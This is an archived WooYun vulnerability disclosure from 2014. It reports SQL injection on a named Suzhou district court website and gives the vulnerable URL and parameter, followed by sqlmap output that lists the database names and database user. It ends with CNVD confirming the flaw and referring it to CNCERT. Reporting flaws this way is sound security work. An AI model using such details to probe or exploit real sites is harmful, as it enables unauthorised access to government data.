乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-07: 细节已通知厂商并且等待厂商处理中 2014-06-12: 厂商已经确认,细节仅向厂商公开 2014-06-22: 细节向核心白帽子及相关领域专家公开 2014-07-02: 细节向普通白帽子公开 2014-07-12: 细节向实习白帽子公开 2014-07-23: 细节向公众公开
苏州某政府网站存在SQL注入漏洞,没啥技术含量,友情检测
苏州市吴中区人民法院网站存在SQL注入,存在问题的url为:http://www.szwzfy.gov.cn/fglt_show.php?id=37用sqlmap简单跑了下,未敢深入
[11:20:11] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.5web application technology: Apache 2.2.15, PHP 5.3.15back-end DBMS: MySQL 5.0.11[11:20:11] [INFO] fetching database names[11:20:12] [INFO] the SQL query used returns 2 entries[11:20:12] [INFO] retrieved: "information_schema"[11:20:12] [INFO] retrieved: "wzfyw0905"available databases [2]:[*] information_schema[*] wzfyw0905
[11:20:58] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.5web application technology: Apache 2.2.15, PHP 5.3.15back-end DBMS: MySQL 5.0.11[11:20:58] [INFO] fetching database users[11:20:58] [INFO] the SQL query used returns 1 entries[11:20:58] [INFO] retrieved: "'wzfyw0905'@'localhost'"database management system users [1]:[*] 'wzfyw0905'@'localhost'
看着办吧
危害等级:中
漏洞Rank:10
确认时间:2014-06-12 08:32
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心处置。
暂无